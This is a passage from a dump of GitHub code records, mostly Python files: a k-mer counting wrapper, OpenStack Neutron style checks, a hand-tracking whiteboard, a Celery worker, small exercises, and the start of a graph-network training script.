width=120)\n\n\nroot.mainloop()\n\n","repo_name":"Ddady1/Subtitler","sub_path":"Subtitler.py","file_name":"Subtitler.py","file_ext":"py","file_size_in_byte":26242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6821104558","text":"numbersTaken = [2, 5, 12, 33, 17]\n\nprint('here are the numbers still available')\n\nfor n in range (1, 20): # 1 t0 19\n if n in numbersTaken:\n continue #skip the line after\n print(n)\n\n ","repo_name":"murchie85/Python-Basics","sub_path":"Continue.py","file_name":"Continue.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"28494843577","text":"class Solution:\n def arrayNesting(self, nums: List[int]) -> int:\n visited = set()\n def dfs(node):\n if node in visited:\n return 0\n visited.add(node)\n return dfs(nums[node]) + 1\n ans = 0\n for i in range(len(nums)):\n ans = max(ans, dfs(i))\n return ans\n ","repo_name":"fasil729/Comptetive-Programming-A2SV","sub_path":"0565-array-nesting/0565-array-nesting.py","file_name":"0565-array-nesting.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"39956683410","text":"from glob import glob\nimport os\nimport re\nfrom sys import stderr\nimport Tabular\n\ndef err(s):\n\tstderr.write(s)\n\ndef runKMC(options, gids):\n\tdList = glob(options.kmcDir + '/*')\n\tfor i in dList:\n\t\tos.remove(i)\n\n\tfList = []\n\tfor i in gids:\n\t\tfList.append(i + '.fasta')\n\n\terr(\"Running KMC...\\n\\t\")\n\tcnt = 0\n\tinc = len(fList) / 50.\n\tfor i in fList:\n\t\tif cnt >= inc:\n\t\t\terr('=')\n\t\t\tcnt = 0\n\t\tcnt += 1\n\n\t\tfName = options.fastaDir + i\n\n\t\tcmdArr = []\n\t\tif options.pairedEnd:\n\t\t\tcmdArr = ['kmc.sh', str(options.kmerSize), '@' + fName, options.kmcDir + i, options.kmcDir, \"> /dev/null\"]\n\t\telse:\n\t\t\tcmdArr = ['kmc.sh', str(options.kmerSize), fName, options.kmcDir + i, options.kmcDir, \"> /dev/null\"]\n\t\tcmd = ' '.join(cmdArr)\n\n\t\tos.system(cmd)\n\t\tos.system('rm ' + str(options.kmcDir) + i + '.kmc_pre')\n\t\tos.system('rm ' + str(options.kmcDir) + i + '.kmc_suf')\n\terr(\"\\n\")\n\ndef readKMCOut(fName, options):\n\tf = open(fName)\n\n\tkmerHsh = {}\n\tfor i in f:\n\t\ti = i.strip().split('\\t')\n\t\tif options.presence_absence:\n\t\t\tkmerHsh[i[0]] = 1\n\t\telse:\n\t\t\tkmerHsh[i[0]] = int(i[1])\n\n\tf.close()\n\n\treturn kmerHsh\n\ndef readKMC(options):\n\tfList = glob(options.kmcDir + '*.' + str(options.kmerSize) + '.kmrs')\n\n\tkmerHsh = {}\n\tcount = 0\n\tinc = len(fList) / 50\n\tstderr.write(\"Reading KMC files...\\n\\t\")\n\tfor i in fList:\n\t\tif count > inc:\n\t\t\tstderr.write('=')\n\t\t\tcount = 0\n\t\tcount += 1\n\n\t\tgid = re.sub(r'\\.fasta\\.[0-9]*\\.kmrs', '', os.path.basename(i))\n\t\tkmerHsh[gid] = readKMCOut(i, options)\n\tstderr.write('\\n')\n\n\treturn kmerHsh\n\ndef mergeFastasAndRunKMC(options):\n\tgids = Tabular.getGIDs(options)\n\n\tcmd = '>' + str(options.tempDir + 'allFasta.fasta')\n\terr(\"merging all KMC...\\n\\t\")\n\tcnt = 0\n\tinc = len(gids) / 50.\n\tfor i in gids:\n\t\tif cnt >= inc:\n\t\t\terr('=')\n\t\t\tcnt = 0\n\t\tcnt += 1\n\n\t\tif os.path.isfile(str(options.fastaDir) + i + '.fasta'):\n\t\t\t# cmdArr.append(str(options.fastaDir) + i + '.fasta')\n\t\t\tcmdArr = ['cat', str(options.fastaDir) + i + '.fasta', '>> ' + str(options.tempDir + 'allFasta.fasta')]\n\t\t\tcmd = ' '.join(cmdArr)\n\t\t\tos.system(cmd)\n\terr('\\n')\n\n\t# cmdArr = ['cat', str(options.fastaDir) + '*.fasta > ' + str(options.tempDir + 'allFasta.fasta')]\n\t# cmd = ' '.join(cmdArr)\n\t# os.system(cmd)\n\n\tif not options.pairedEnd:\n\t\tcmdArr = ['kmc.sh', str(options.kmerSize), options.tempDir + 'allFasta.fasta', options.tempDir + 'allFasta.fasta', options.tempDir]\n\telse:\n\t\tcmdArr = ['kmc.sh', str(options.kmerSize), '@' + options.tempDir + 'allFasta.fasta', options.tempDir + 'allFasta.fasta', options.tempDir]\n\tcmd = ' '.join(cmdArr)\n\tos.system(cmd)\n\n\tcmdArr = ['rm', options.tempDir + 'allFasta.fasta']\n\tcmd = ' '.join(cmdArr)\n\tos.system(cmd)\n\ndef getAllFeats(options):\n\tallFeats = {}\n\n\tf = open(options.tempDir + 'allFasta.fasta.' + str(options.kmerSize) + '.kmrs')\n\n\tfor i in f:\n\t\ti = i.strip().split('\\t')\n\t\tif len(i) != 2:\n\t\t\tcontinue\n\n\t\tif i[0] not in allFeats:\n\t\t\tallFeats[i[0]] = 0\n\n\tf.close()\n\n\tcount = 0\n\tfor i in sorted(allFeats):\n\t\tallFeats[i] = count\n\t\tcount += 1\n\n\treturn allFeats\n\ndef normalizeByTot(kmerHsh):\n\ttot = 0\n\n\tfor i in kmerHsh:\n\t\ttot += kmerHsh[i]\n\n\ttot = float(tot)\n\n\tfor i in kmerHsh:\n\t\tkmerHsh[i] /= tot\n\ndef normalizeByMarkov(kmerHsh):\n\tsubHsh = {}\n\n\tfor i in kmerHsh:\n\t\tsub = i[:len(i)/2]\n\t\tif sub not in subHsh:\n\t\t\tsubHsh[sub] = 0\n\t\tsubHsh[sub] += kmerHsh[i]\n\n\t\tsub = i[len(i)/2:]\n\t\tif sub not in subHsh:\n\t\t\tsubHsh[sub] = 0\n\t\tsubHsh[sub] += kmerHsh[i]\n\n\tfor i in subHsh:\n\t\tsubHsh[i] = float(subHsh[i])\n\n\tfor i in kmerHsh:\n\t\tsub = i[:len(i)/2]\n\t\tkmerHsh[i] /= subHsh[i]\n\ndef normalizeKMC(kmerHsh, options):\n\tif options.normalize == 0:\n\t\treturn\n\telif options.normalize == 1:\n\t\tnormalizeByTot(kmerHsh)\n\t\treturn\n\telif options.normalize == 2:\n\t\tnormalizeByMarkov(kmerHsh)\n\t\treturn\n\telse:\n\t\tstderr.write(\"Invalid -r | --normalize_kmer option. Valid values { 0 1 2 }.\\n\")\n\t\texit(1)\n\n\n","repo_name":"Tinyman392/GenomicModelCreator","sub_path":"KMC.py","file_name":"KMC.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"8671720031","text":"import os\nimport re\n\nfrom hacking import core\n\n\n# Guidelines for writing new hacking checks\n#\n# - Use only for Neutron specific tests. OpenStack general tests\n# should be submitted to the common 'hacking' module.\n# - Pick numbers in the range N3xx. Find the current test with\n# the highest allocated number and then pick the next value.\n# - Keep the test method code in the source file ordered based\n# on the N3xx value.\n# - List the new rule in the top level HACKING.rst file\n# - Add test cases for each new rule to\n# neutron/tests/unit/hacking/test_checks.py\n\n\nfilter_match = re.compile(r\".*filter\\(lambda \")\n\ntests_imports_dot = re.compile(r\"\\bimport[\\s]+neutron.tests\\b\")\ntests_imports_from1 = re.compile(r\"\\bfrom[\\s]+neutron.tests\\b\")\ntests_imports_from2 = re.compile(r\"\\bfrom[\\s]+neutron[\\s]+import[\\s]+tests\\b\")\n\nimport_mock = re.compile(r\"\\bimport[\\s]+mock\\b\")\nimport_from_mock = re.compile(r\"\\bfrom[\\s]+mock[\\s]+import\\b\")\nimport_six = re.compile(r\"\\bimport[\\s]+six\\b\")\nimport_from_six = re.compile(r\"\\bfrom[\\s]+six[\\s]+import\\b\")\n\n\n@core.flake8ext\ndef check_assert_called_once_with(logical_line, filename):\n \"\"\"N322 - Try to detect unintended calls of nonexistent mock methods like:\n assertCalledOnceWith\n assert_has_called\n called_once_with\n \"\"\"\n if 'neutron/tests/' in filename:\n if '.assert_called_once_with(' in logical_line:\n return\n uncased_line = logical_line.lower().replace('_', '')\n\n check_calls = ['.assertcalledoncewith', '.calledoncewith']\n if any(x for x in check_calls if x in uncased_line):\n msg = (\"N322: Possible use of no-op mock method. \"\n \"please use assert_called_once_with.\")\n yield (0, msg)\n\n if '.asserthascalled' in uncased_line:\n msg = (\"N322: Possible use of no-op mock method. \"\n \"please use assert_has_calls.\")\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_asserttruefalse(logical_line, filename):\n \"\"\"N328 - Don't use assertEqual(True/False, observed).\"\"\"\n if 'neutron/tests/' in filename:\n if re.search(r\"assertEqual\\(\\s*True,[^,]*(,[^,]*)?\", logical_line):\n msg = (\"N328: Use assertTrue(observed) instead of \"\n \"assertEqual(True, observed)\")\n yield (0, msg)\n if re.search(r\"assertEqual\\([^,]*,\\s*True(,[^,]*)?\", logical_line):\n msg = (\"N328: Use assertTrue(observed) instead of \"\n \"assertEqual(True, observed)\")\n yield (0, msg)\n if re.search(r\"assertEqual\\(\\s*False,[^,]*(,[^,]*)?\", logical_line):\n msg = (\"N328: Use assertFalse(observed) instead of \"\n \"assertEqual(False, observed)\")\n yield (0, msg)\n if re.search(r\"assertEqual\\([^,]*,\\s*False(,[^,]*)?\", logical_line):\n msg = (\"N328: Use assertFalse(observed) instead of \"\n \"assertEqual(False, observed)\")\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_assertitemsequal(logical_line, filename):\n \"\"\"N329 - Don't use assertItemsEqual.\"\"\"\n if 'neutron/tests/' in filename:\n if re.search(r\"assertItemsEqual[\\(,]\", logical_line):\n msg = (\"N329: Use assertCountEqual() instead of \"\n \"assertItemsEqual()\")\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_assertempty(logical_line, filename):\n \"\"\"N330 - Enforce using assertEqual parameter ordering in case of empty\n objects.\n \"\"\"\n if 'neutron/tests/' in filename:\n msg = (\"N330: Use assertEqual(*empty*, observed) instead of \"\n \"assertEqual(observed, *empty*). *empty* contains \"\n \"{}, [], (), set(), '', \\\"\\\"\")\n empties = r\"(\\[\\s*\\]|\\{\\s*\\}|\\(\\s*\\)|set\\(\\s*\\)|'\\s*'|\\\"\\s*\\\")\"\n reg = r\"assertEqual\\(([^,]*,\\s*)+?%s\\)\\s*$\" % empties\n if re.search(reg, logical_line):\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_assertisinstance(logical_line, filename):\n \"\"\"N331 - Enforce using assertIsInstance.\"\"\"\n if 'neutron/tests/' in filename:\n if re.search(r\"assertTrue\\(\\s*isinstance\\(\\s*[^,]*,\\s*[^,]*\\)\\)\",\n logical_line):\n msg = (\"N331: Use assertIsInstance(observed, type) instead \"\n \"of assertTrue(isinstance(observed, type))\")\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_assertequal_for_httpcode(logical_line, filename):\n \"\"\"N332 - Enforce correct ordering for httpcode in assertEqual.\"\"\"\n msg = (\"N332: Use assertEqual(expected_http_code, observed_http_code) \"\n \"instead of assertEqual(observed_http_code, expected_http_code)\")\n if 'neutron/tests/' in filename:\n if re.search(r\"assertEqual\\(\\s*[^,]*,[^,]*HTTP[^\\.]*\\.code\\s*\\)\",\n logical_line):\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_oslo_i18n_wrapper(logical_line, filename, noqa):\n \"\"\"N340 - Check for neutron.i18n usage.\"\"\"\n\n if noqa:\n return\n\n split_line = logical_line.split()\n modulename = os.path.normpath(filename).split('/')[0]\n bad_i18n_module = '%s.i18n' % modulename\n\n if (len(split_line) > 1 and split_line[0] in ('import', 'from')):\n if (split_line[1] == bad_i18n_module or\n modulename != 'neutron' and split_line[1] in\n ('neutron.i18n', 'neutron._i18n')):\n msg = (\"N340: %(found)s is found. Use %(module)s._i18n instead.\"\n % {'found': split_line[1], 'module': modulename})\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_builtins_gettext(logical_line, tokens, filename, lines, noqa):\n \"\"\"N341 - Check usage of builtins gettext _().\"\"\"\n\n if noqa:\n return\n\n modulename = os.path.normpath(filename).split('/')[0]\n\n if '%s/tests' % modulename in filename:\n return\n\n if os.path.basename(filename) in ('i18n.py', '_i18n.py'):\n return\n\n token_values = [t[1] for t in tokens]\n i18n_wrapper = '%s._i18n' % modulename\n\n if '_' in token_values:\n i18n_import_line_found = False\n for line in lines:\n split_line = [elm.rstrip(',') for elm in line.split()]\n if (len(split_line) > 1 and split_line[0] == 'from' and\n split_line[1] == i18n_wrapper and\n '_' in split_line):\n i18n_import_line_found = True\n break\n if not i18n_import_line_found:\n msg = (\"N341: _ from python builtins module is used. \"\n \"Use _ from %s instead.\" % i18n_wrapper)\n yield (0, msg)\n\n\n@core.flake8ext\ndef check_no_imports_from_tests(logical_line, filename, noqa):\n \"\"\"N343 - Production code must not import from neutron.tests.*\n \"\"\"\n msg = (\"N343: Production code must not import from neutron.tests.*\")\n\n if noqa:\n return\n\n if 'neutron/tests/' in filename:\n return\n\n for regex in tests_imports_dot, tests_imports_from1, tests_imports_from2:\n if re.match(regex, logical_line):\n yield(0, msg)\n\n\n@core.flake8ext\ndef check_python3_no_filter(logical_line):\n \"\"\"N344 - Use list comprehension instead of filter(lambda).\"\"\"\n\n msg = (\"N344: Use list comprehension instead of \"\n \"filter(lambda obj: test(obj), data) on python3.\")\n\n if filter_match.match(logical_line):\n yield(0, msg)\n\n\n# TODO(boden): rehome this check to neutron-lib\n@core.flake8ext\ndef check_no_sqlalchemy_event_import(logical_line, filename, noqa):\n \"\"\"N346 - Use neutron_lib.db.api.sqla_listen rather than sqlalchemy.\"\"\"\n if noqa:\n return\n is_import = (logical_line.startswith('import') or\n logical_line.startswith('from'))\n if not is_import:\n return\n for kw in ('sqlalchemy', 'event'):\n if kw not in logical_line:\n return\n yield (0, \"N346: Register sqlalchemy events through \"\n \"neutron_lib.db.api.sqla_listen so they can be cleaned up \"\n \"between unit tests\")\n\n\n@core.flake8ext\ndef check_no_import_mock(logical_line, filename, noqa):\n \"\"\"N347 - Test code must not import mock library\n \"\"\"\n msg = (\"N347: Test code must not import mock library\")\n\n if noqa:\n return\n\n if 'neutron/tests/' not in filename:\n return\n\n for regex in import_mock, import_from_mock:\n if re.match(regex, logical_line):\n yield(0, msg)\n\n\n@core.flake8ext\ndef check_no_import_six(logical_line, filename, noqa):\n \"\"\"N348 - Test code must not import six library\n \"\"\"\n msg = \"N348: Test code must not import six library\"\n\n if noqa:\n return\n\n for regex in import_six, import_from_six:\n if re.match(regex, logical_line):\n yield(0, msg)\n","repo_name":"openstack/neutron","sub_path":"neutron/hacking/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":8732,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"29705445858","text":"import cv2\nfrom mediapipe.framework.formats.landmark_pb2 import LandmarkList\nimport numpy as np\nimport os\nimport HandTrack_Module as HT\n#######################\nbrushThickness = 15\neraserThickness = 100\n########################\n\n\nfolderPath = \"header\"\nmyList = os.listdir(folderPath)\nprint(myList)\n\n\nheaderList = []\nfor imPath in myList:\n image = cv2.imread(f'{folderPath}/{imPath}')\n headerList.append(image)\nprint(len(headerList))\nheader = headerList[0]\n\ndrawColor = (255, 0, 255)\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 1280)\ncap.set(4, 720)\n\ndetector = HT.handDetect(detectConf=0.75,maxHands=1)\nxp, yp = 0, 0\nimgCanvas = np.zeros((720, 1280, 3), np.uint8)\n\nwhile True:\n\n # 1. Import image\n success, img = cap.read()\n img = cv2.flip(img, 1)\n\n # 2. Find Hand Landmarks\n img = detector.lookForHands(img)\n lmList = detector.lookForPosition(img, draw=False)\n\n if len(lmList) != 0:\n\n # print(lmList)\n\n # tip of index and middle fingers\n x1, y1 = lmList[8][1:]\n x2, y2 = lmList[12][1:]\n\n # 3. Check which fingers are up\n fingers = detector.lookForFinger()\n # print(fingers)\n\n # 4. If Selection Mode - Two finger are up\n if fingers[1] and fingers[2]:\n # xp, yp = 0, 0\n #print(\"Selection Mode\")\n #cracking my head open yes thankyou\n if(y1 < 125):\n if(x1 >= 200 and x1 <= (200+100)):\n #print(\"select color : red\")\n Header = headerList[0]\n drawColor = (52, 64, 235)\n elif(x1 >= 350 and x1 <= (350+100)):\n # print(\"Select Colour : yellow\")\n Header = headerList[1]\n drawColor = (11,195,255)\n elif(x1 >= 500 and x1 <= (500 + 100)):\n #print(\"select color : blue\")\n Header = headerList[2]\n drawColor=(235, 64, 52)\n elif(x1 >= 1000 and x1 <=(1000+100)):\n #print(\"erase\")\n activeHeader = headerList[3]\n drawColor = (0,0,0)\n cv2.rectangle(img, (x1, y1 - 25), (x2, y2 + 25), drawColor, cv2.FILLED)\n\n # 5. If Drawing Mode - Index finger is up\n if fingers[1] and fingers[2] == False:\n cv2.circle(img, (x1, y1), 15, drawColor, cv2.FILLED)\n #print(\"Drawing Mode\")\n if xp == 0 and yp == 0:\n xp, yp = x1, y1\n\n cv2.line(img, (xp, yp), (x1, y1), drawColor, brushThickness)\n cv2.line(imgCanvas,(xp,yp), (x1,y1), drawColor,brushThickness)\n\n if drawColor == (0, 0, 0):\n cv2.line(img, (xp, yp), (x1, y1), drawColor, eraserThickness)\n cv2.line(imgCanvas, (xp, yp), (x1, y1), drawColor, eraserThickness)\n #\n else:\n cv2.line(img, (xp, yp), (x1, y1), drawColor, brushThickness)\n cv2.line(imgCanvas, (xp, yp), (x1, y1), drawColor, brushThickness)\n\n xp, yp = x1, y1\n\n\n # # Clear Canvas when all fingers are up\n #if all (x >= 1 for x in fingers):\n #imgCanvas = np.zeros((720, 1280, 3), np.uint8)\n\n imgGray = cv2.cvtColor(imgCanvas, cv2.COLOR_BGR2GRAY)\n _, imgInv = cv2.threshold(imgGray, 50, 255, cv2.THRESH_BINARY_INV)\n imgInv = cv2.cvtColor(imgInv,cv2.COLOR_GRAY2BGR)\n img = cv2.bitwise_and(img,imgInv)\n img = cv2.bitwise_or(img,imgCanvas)\n\n\n # Setting the header image\n img[0:125, 0:1280] = header\n # img = cv2.addWeighted(img,0.5,imgCanvas,0.5,0)\n cv2.imshow(\"Image\", img)\n #cv2.imshow(\"Canvas\", imgCanvas)\n #cv2.imshow(\"Inv\", imgInv)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncv2.destroyAllWindows()","repo_name":"RichardWibowo/AI-Whiteboard","sub_path":"WhiteBoard_Module.py","file_name":"WhiteBoard_Module.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40452203170","text":"import os\nfrom celery.bin import worker\nfrom argparse import ArgumentParser\nfrom nesta.tasks.tasks import get_worker\nfrom nesta.tasks.notice import get_notice\nfrom nesta.configs.util import parse_env, parse_config\nfrom nesta.external.daemon import Daemon\nfrom celery.bin.celeryd_detach import detached_celeryd\n\n\ndef parse_arguments():\n parser = ArgumentParser()\n parser.add_argument(\"--name\", dest=\"name\", type=str,\n help=\"worker name(worker, notice)\", required=True)\n return parser.parse_args()\n\n\nclass Worker(Daemon):\n def __init__(self, name, configs):\n assert isinstance(configs, dict)\n conf = configs[\"services\"].get(name)\n if conf is None:\n raise ValueError(\n \"Config does not defined for service: {}\".format(name))\n\n logfile = conf[\"logfile\"]\n super().__init__(\n pidfile=conf[\"pidfile\"],\n stdout=logfile,\n stderr=logfile\n )\n\n app = None\n if name == \"worker\":\n app = get_worker(**configs)\n elif name == \"notice\":\n app = get_notice(**configs)\n else:\n raise ValueError(\"Unknown worker name: {}\".format(name))\n self._worker = worker.worker(app=app)\n \n self._config = {\n \"logfile\": conf[\"logfile\"],\n \"loglevel\": conf[\"loglevel\"],\n \"traceback\": True,\n }\n\n def _run(self):\n self._worker.run(**self._config)\n\n\nif __name__ == \"__main__\":\n env_dict = parse_env()\n configs = parse_config(env_dict[\"MODE\"])\n\n options = parse_arguments()\n\n w = Worker(options.name, configs=configs)\n w.start()","repo_name":"phaesoo/nesta","sub_path":"nesta/worker/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24739138355","text":"from random import randint\n\nguessed = False\nrnd = randint(1, 10)\nprint(\"Zgaduj zgadula!!!\")\nwhile True:\n try:\n while not guessed:\n str_num = input(\"Podaj liczbę 1 - 10:\")\n num = int(str_num)\n if num > 10 or num < 1:\n print(\"Liczby w przedziale 1 - 10.\")\n elif num == rnd:\n print(\"Brawo!\")\n guessed = True\n else:\n print(\"Pudło!\")\n except ValueError:\n print(\"To nie jest liczba!\"\n \"Spróbuj ponownie.\")\n","repo_name":"kamilnowak05/nauka","sub_path":"Python podstawy/1_Zadania/Dzien_3/6_Wyjątki/exercise_4.py","file_name":"exercise_4.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36017522964","text":"from builtins import range\nimport mwparserfromhell as mwp\nfrom .error import Error\n\n\nclass MWParserModError(Error):\n pass\n\n\nclass NotWikicodeError(MWParserModError):\n pass\n\n\ndef parse(wikitext):\n wikicode = mwp.parse(wikitext, skip_style_tags=True)\n _split_wikicode_on_endlines(wikicode)\n return wikicode\n\n\ndef seperate_wikicode_nodes_on_newlines(wikicode):\n if type(wikicode) is not mwp.wikicode.Wikicode:\n raise NotWikicodeError(type(wikicode))\n _split_wikicode_on_endlines(wikicode)\n\n\ndef _split_wikicode_on_endlines(wikicode):\n divided = []\n cur = []\n for node in wikicode.nodes:\n if type(node) is mwp.nodes.text.Text:\n split_nodes = _split_text_node_on_endline(node)\n if len(split_nodes) > 1:\n wikicode.replace(node, split_nodes[0])\n for i in range(1, len(split_nodes)):\n wikicode.insert_after(split_nodes[i - 1], split_nodes[i])\n\n\ndef _split_text_node_on_endline(text_node):\n text = text_node.value\n lines = _split_text_and_leave_delimiter(text, \"\\n\")\n results = []\n for line in lines:\n if line != \"\":\n results.append(mwp.nodes.text.Text(line))\n return results\n\n\ndef _split_text_and_leave_delimiter(text, delimiter):\n result = []\n lines = text.split(delimiter)\n for i, line in enumerate(lines):\n if i == (len(lines) - 1):\n break\n result.append(line + delimiter)\n result.append(lines[i])\n return result\n","repo_name":"amyxzhang/wikum","sub_path":"wikum/wikichatter/mwparsermod.py","file_name":"mwparsermod.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"72"} +{"seq_id":"14923976739","text":"# -*- coding: utf8 -*-\n\nimport sys\nimport util.path\nimport util.zip_package as zip\n\npath = util.path.path\n\ndef pack_skin():\n print('pack_skin')\n zip.zip_folder(str(path['CoreRoot'] / 'DuiLib' / 'Resources'), str(path['ResultCore'] / 'skin.zip'), zip.FileNameRegexNegtiveFilter('thumbs\\.db'))\n\ndef Configuration():\n if len(sys.argv) > 1:\n return sys.argv[1]\n return 'Debug'\n\nif __name__ == '__main__':\n util.path.ResetPath(Configuration())\n pack_skin()\n","repo_name":"yatyricky/XYWE","sub_path":"Build/Python/pack_skin.py","file_name":"pack_skin.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33194682696","text":"\"\"\" create an instruction function for when the user does not know how to play,\n connecting codes\n Katelyn Gee\n 05/04/2022\"\"\"\n\n\n# yes/no checker function goes here:\ndef yes_no(asking):\n while True:\n # Ask user if they have played the game in the past\n question = input(asking).lower()\n\n # If yes, calling on game function\n if question == \"y\" or question == \"yes\":\n question = \"Yes\"\n return question\n\n # If no, calling on instruction function\n elif question == \"n\" or question == \"no\":\n question = \"No\"\n return question\n\n # If incorrect input, repeat questions\n else:\n print(\"Incorrect input, please enter yes or no (y/n).\")\n return question\n\n\n# function to display instructions\ndef instructions():\n print(\"*** How to play ***\")\n print()\n print(\"The game rules will go here\")\n print()\n print(\"Program continues\")\n\n\n# main routine goes here:\nplayed_before = yes_no(\"Do you know how to play this game (Lucky Unicorn)? Y/N \")\n\nif played_before == \"No\":\n instructions()\nelse:\n print(\"Program continues\")\n\n","repo_name":"Kgee321/Lucky_Unicorn","sub_path":"03_instructions_v1.py","file_name":"03_instructions_v1.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33735278363","text":"import time\nimport json\nimport argparse\nimport importlib\nimport os\nimport sys\n\nimport joblib\nimport numpy as np\nimport sklearn\nfrom sklearn.metrics import average_precision_score, balanced_accuracy_score, matthews_corrcoef, jaccard_score, \\\n roc_curve, auc, accuracy_score, precision_recall_fscore_support\nfrom sklearn.model_selection import KFold, StratifiedKFold\nimport tensorflow as tf\nif tf.__version__.split(\".\")[0]=='2':\n import tensorflow.compat.v1 as tf\n tf.disable_v2_behavior()\n import tensorflow.compat.v1.logging as logging\nelse:\n import tensorflow.logging as logging\n\nfrom tensorflow.python.framework import graph_util\n\nimport kgcn.layers\nfrom kgcn.data_util import load_and_split_data, load_data, split_data\nfrom kgcn.core import CoreModel\nfrom kgcn.make_plots import plot_cost, plot_auc, plot_r2\nfrom kgcn.make_plots import make_cost_acc_plot\n\n\nclass dotdict(dict):\n \"\"\"dot.notation access to dictionary attributes\"\"\"\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\n def __getstate__(self):\n return self.__dict__\n\n def __setstate__(self, dict):\n self.__dict__ = dict\n\n\nclass NumPyArangeEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.int64):\n return int(obj)\n if isinstance(obj, np.float64):\n return float(obj)\n if isinstance(obj, np.int32):\n return int(obj)\n if isinstance(obj, np.float32):\n return float(obj)\n if isinstance(obj, np.ndarray):\n return obj.tolist() # or map(int, obj)\n return json.JSONEncoder.default(self, obj)\n\n\ndef save_prediction(filename, prediction_data):\n print(f\"[SAVE] {filename}\")\n if os.path.dirname(filename)!=\"\":\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n\n pred = np.array(prediction_data)\n with open(filename, \"w\") as fp:\n if len(pred.shape) == 2:\n # graph-centric mode\n # prediction: graph_num x dist\n for dist in pred:\n fp.write(\",\".join(map(str, dist)))\n fp.write(\"\\n\")\n elif len(pred.shape) == 3:\n # node-centric mode\n # prediction: graph_num x node_num x dist\n for node_pred in pred:\n for dist in node_pred:\n fp.write(\",\".join(map(str, dist)))\n fp.write(\"\\n\")\n fp.write(\"\\n\")\n else:\n print(\"[ERROR] unknown prediction format\")\n\n\ndef get_default_config():\n config = {}\n config[\"model.py\"] = \"model\"\n config[\"dataset\"] = \"data.jbl\"\n config[\"validation_dataset\"] = None\n # optimization parameters\n config[\"epoch\"] = 50\n config[\"batch_size\"] = 10\n config[\"patience\"] = 0\n config[\"learning_rate\"] = 0.3\n config[\"validation_data_rate\"] = 0.3\n config[\"shuffle_data\"] = False\n config[\"k-fold_num\"] = 2\n # model parameters\n config[\"with_feature\"] = True\n config[\"with_node_embedding\"] = False\n config[\"embedding_dim\"] = 10\n config[\"normalize_adj_flag\"] = False\n config[\"split_adj_flag\"] = False\n config[\"order\"] = 1\n config[\"param\"] = None\n # model\n config[\"save_interval\"] = 10\n config[\"save_model_path\"] = \"model\"\n # result/info\n # config[\"save_result_train\"]=None\n config[\"save_result_valid\"] = None\n config[\"save_result_test\"] = None\n config[\"save_result_cv\"] = None\n config[\"save_info_train\"] = None\n config[\"save_info_valid\"] = None\n config[\"save_info_test\"] = None\n config[\"save_info_cv\"] = None\n config[\"make_plot\"] = False\n config[\"plot_path\"] = \"./result/\"\n config[\"visualize_path\"] = \"./visualization/\"\n config[\"plot_multitask\"] = False\n config[\"task\"] = \"multitask_classification\"\n config[\"retrain\"] = None\n #\n config[\"profile\"] = False\n config[\"export_model\"] = None\n # for visualization options\n config[\"visualize_kg\"] = None\n\n config[\"stratified_kfold\"] = False\n config[\"prediction_data\"] = None\n\n return config\n\n\ndef load_model_py(model, model_py, is_train=True, feed_embedded_layer=False, batch_size=None):\n pair = model_py.split(\":\")\n sys.path.append(os.getcwd())\n if len(pair) >= 2:\n logging.info(f\"[LOAD] {pair[1]} from {pair[0]}\")\n mod = importlib.import_module(pair[0])\n cls = getattr(mod, pair[1])\n obj = cls()\n if model:\n model.build(obj, is_train, feed_embedded_layer, batch_size)\n return obj\n else:\n logging.info(f\"[LOAD] {pair[0]}\")\n mod = importlib.import_module(pair[0])\n if model:\n model.build(mod, is_train, feed_embedded_layer, batch_size)\n return mod\n\n\ndef print_ckpt(sess, ckpt):\n print(f\"== {ckpt}\")\n for var_name, _ in tf.contrib.framework.list_variables(ckpt):\n var = tf.contrib.framework.load_variable(ckpt, var_name)\n print(var_name, var.shape)\n print(\"==\")\n\n\ndef print_variables():\n print('== neural network')\n vars_em = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n for v in vars_em:\n print(v.name, v.shape)\n print(\"==\")\n\n\ndef compute_metrics(config, info, prediction_data, labels):\n pred_score = np.array(prediction_data)\n true_label = np.array(labels)\n # pred_score: #data x # task x #class\n if len(pred_score.shape) == 1:\n pred_score = pred_score[:, np.newaxis, np.newaxis]\n elif len(pred_score.shape) == 2:\n pred_score = np.expand_dims(pred_score, axis=1)\n logging.info(f\"prediction #data x # task x #class: {pred_score.shape}\")\n # multilabel=True => pred_score: #data x # task x #class\n # multilabel=False => pred_score: 